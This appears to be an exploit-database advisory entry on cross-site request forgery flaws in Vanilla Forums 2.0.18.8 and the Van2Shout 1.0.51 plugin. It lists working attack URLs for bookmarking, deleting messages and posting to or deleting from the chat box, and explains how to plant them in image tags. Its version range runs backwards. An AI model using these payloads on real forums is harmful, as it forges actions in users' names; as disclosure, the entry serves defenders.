vendor:
Van2Shout
by:
Henry Hoggard
6,8
CVSS
MEDIUM
Multiple CSRF
352
CWE
Product Name: Van2Shout
Affected Version From: 2.0.18.8
Affected Version To: 1.0.51
Patch Exists: YES
Related CWE: N/A
CPE: vanillaforums.org/download, vanillaforums.org/get/van2shout-plugin-1.051
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Debian
2013
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
You can exploit these by having the user visit a thread with the img src of the below urls. eg <img src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where 1337 is the id. Bookmark CSRF: http://site.org/index.php=/vanilla/discussion/bookmark/1337 UnBookmark CSRF: http://site.org/index.php=/vanilla/discussion/bookmark/1337? Delete Message CSRF: http://site.org/index.php=/messages/clear/1337 Post to Van2Shout Chat Box CSRF: http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage Delete Message from Van2Shout Chatbox CSRF: http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337
Mitigation:
Ensure that user input is validated and sanitized before being used in any application.
